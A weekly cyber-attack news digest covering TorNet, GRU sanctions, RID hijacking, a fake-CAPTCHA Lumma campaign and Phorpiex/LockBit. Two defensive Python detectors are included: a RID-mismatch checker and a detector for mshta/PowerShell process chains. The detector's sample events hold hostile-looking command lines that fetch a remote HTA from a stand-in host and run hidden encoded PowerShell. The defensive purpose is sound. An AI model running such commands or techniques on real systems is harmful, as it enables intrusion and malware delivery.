Cyber attacks
29 January 2025

Weekly Summary Cyber attacks January 23rd-29th

TorNet, a new malware targeting users in Central Europe, discovered   

Cybersecurity researchers have identified an ongoing campaign, active since July 2024, that mainly targets users in Poland and Germany via phishing emails. The group sends messages disguised as bank transfer confirmations and fake receipts; victims who open the zipped attachments run a malware called PureCrypter, which in turn installs a novel backdoor called “TorNet”. The backdoor uses several evasion techniques, such as briefly disconnecting the machine from the network before installing itself and communicating with its command-and-control servers over the Tor network, which makes it difficult to track. It establishes persistence through scheduled tasks and manipulates Windows security settings so that it stays active even in low-power conditions. The backdoor can execute commands and load additional code into system memory, widening the scope of the intrusion, and it includes checks to evade scanning and virtualization environments, further improving its camouflage.

EU sanctions Russian GRU hackers for cyberattacks against Estonia  

The European Union has imposed sanctions on three hackers from the GRU, Russia's military intelligence service, for their involvement in cyberattacks against Estonian government agencies in 2020. Officers Nikolay Korchagin, Vitaly Shevchenko and Yuriy Denisov, members of Unit 29155, gained unauthorized access to sensitive data, stealing thousands of classified documents from ministries such as Economic Affairs, Social Affairs and Foreign Affairs. The attacks compromised trade secrets, medical records and critical information, putting the security of the affected institutions at risk. This GRU unit has also executed cyberattacks against other EU countries, NATO allies and nations in Latin America, Europe and Central Asia. Since 2022, the group has focused its efforts on sabotaging organizations that support Ukraine. The U.S. and its allies have linked the GRU to cyberattacks on critical infrastructure globally and have offered a reward of up to $10 million for information on several of its members.


North Korean hackers use RID hijacking technique to hide accounts with administrator access   

A hacker group linked to North Korea, known as Andariel, has employed a technique called RID hijacking to grant administrator permissions to low-privilege accounts on Windows systems without being detected. The method modifies the relative identifier (RID) stored for an account, causing the system to treat the account as having a higher level of access. The attack requires prior access to the system and to the SAM registry hive, which the attackers obtained by using tools such as PsExec and JuicyPotato to execute commands at SYSTEM level. Although that level of access is already high, the hackers created hidden accounts with basic privileges, elevated them through RID hijacking and added them to groups such as Administrators and Remote Desktop Users for greater persistence and discretion. Researchers note that Andariel uses custom malware and open-source tools to perform these modifications. They also hide their activity by removing traces of the altered accounts and ensuring the accounts can be reactivated without appearing in logs. To defend against these attacks, administrators should protect the SAM registry, restrict tools such as PsExec, and apply multifactor authentication to all accounts, including low-privilege ones. The RID hijacking technique has been known since 2018 and remains a persistent threat in Windows environments.
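One defender-side check for the technique described above, added here as an example and not code from the cited research: every local account lives under the registry key HKLM\SAM\SAM\Domains\Account\Users\<RID in hex>, and the RID the OS actually uses is stored inside that key's binary F value (at offset 0x30 as a 32-bit little-endian integer, the layout assumed here). RID hijacking rewrites only the F value, so an account whose key name and stored RID disagree is the signal. The example parses constructed F values offline; walking the live hive, which needs SYSTEM rights to read, is left to the reader.

```python
import struct

# Offset of the 32-bit little-endian RID inside a user key's "F" value.
# This is the documented layout that RID-hijacking checks rely on (assumption).
RID_OFFSET = 0x30
ADMIN_RID = 500  # built-in Administrator


def parse_rid(f_value: bytes) -> int:
    """Return the RID stored inside an account's F value."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def make_f_value(rid: int) -> bytes:
    """Build a constructed F value (zero-filled apart from the RID) for the demo."""
    buf = bytearray(0x50)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def find_rid_mismatches(users: dict) -> list:
    """
    users maps each Users\\ subkey name (the RID in hex, e.g. "000003E9") to its F value.
    Returns (key_name, expected_rid, stored_rid) for every account whose stored RID
    differs from the key it lives under; a stored RID of 500 under a non-500 key is
    the classic hijack pattern.
    """
    findings = []
    for key_name, f_value in users.items():
        expected = int(key_name, 16)
        stored = parse_rid(f_value)
        if stored != expected:
            findings.append((key_name, expected, stored))
    return findings


# Constructed sample hive contents: the built-in Administrator (500), a normal local
# user (1001) and a hidden low-privilege account (1002) whose RID was rewritten to 500.
SAMPLE_USERS = {
    "000001F4": make_f_value(ADMIN_RID),
    "000003E9": make_f_value(1001),
    "000003EA": make_f_value(ADMIN_RID),
}

if __name__ == "__main__":
    for key, expected, stored in find_rid_mismatches(SAMPLE_USERS):
        print(f"RID mismatch under {key}: key name says {expected}, F value says {stored}")
```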


Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks   

Cybersecurity researchers have warned of a new malware campaign that uses fake CAPTCHA checks to distribute the notorious Lumma information stealer. The campaign is global, with victims in countries such as Argentina, Colombia, the United States and the Philippines, and spans multiple industries, including healthcare, banking and marketing, with the telecommunications sector the most affected. The attack begins when a victim visits a compromised website that redirects them to a fake CAPTCHA page, which instructs them to copy and paste a command into the Windows Run dialog; that command uses the mshta.exe binary to download and execute an HTA file from a remote server. The HTA file runs a PowerShell command that launches the next payload, a PowerShell script that unpacks a further PowerShell script responsible for decoding and loading the Lumma payload.
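Detection logic for the chain described above, added here as an example rather than code from the cited research: it flags mshta.exe started from explorer.exe (the Run dialog's parent) with a remote URL on its command line, and PowerShell whose parent is mshta.exe. The event fields and sample records are constructed for the demo and do not follow any particular EDR or Sysmon schema.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed fields, not a real EDR schema)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> Optional[str]:
    """Return a finding label for events matching the fake-CAPTCHA chain, else None."""
    image, parent = _basename(event.image), _basename(event.parent_image)
    # Stage 1: mshta.exe fetching a remote HTA; explorer.exe as parent means the Run dialog.
    if image == "mshta.exe" and URL_RE.search(event.command_line):
        if parent == "explorer.exe":
            return "mshta remote HTA launched from Run dialog"
        return "mshta fetching remote HTA"
    # Stage 2: PowerShell spawned by the HTA stage.
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        return "PowerShell spawned by mshta.exe"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Run classify() over a batch of events and return (pid, label) findings."""
    return [(e.pid, label) for e in events if (label := classify(e))]


# Constructed sample events: the two malicious stages, a benign local HTA and noise.
SAMPLE_EVENTS = [
    ProcessEvent(4120, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://example.invalid/verify.hta"),
    ProcessEvent(4131, r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc AAAA"),
    ProcessEvent(4200, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    ProcessEvent(4300, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe"),
]
```

Only the remote-URL case is flagged, so a locally installed HTA launched by a vendor tool does not fire the rule.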

Phorpiex: the botnet distributing LockBit ransomware   

The Phorpiex botnet, active since 2010, has recently been identified as being used to distribute the latest version of the LockBit Black ransomware (LockBit 3.0). Unlike previous attacks, this variant spreads in an automated fashion without direct human intervention. Since the Phorpiex source code was sold in 2021, its structure has changed little, and it still uses techniques such as deleting the Zone.Identifier stream of downloaded files to hide their origin. LockBit Black, known for its encryption speed and double extortion, is now delivered directly via Phorpiex without spreading through the target's network, a strategic shift. The attack starts with phishing emails carrying malicious attachments that trigger a downloader, which installs the ransomware. In addition, the Phorpiex infrastructure may be being offered as a service to other cybercriminals. Despite international efforts to dismantle LockBit, the group remains active and poses a significant threat to multiple industries.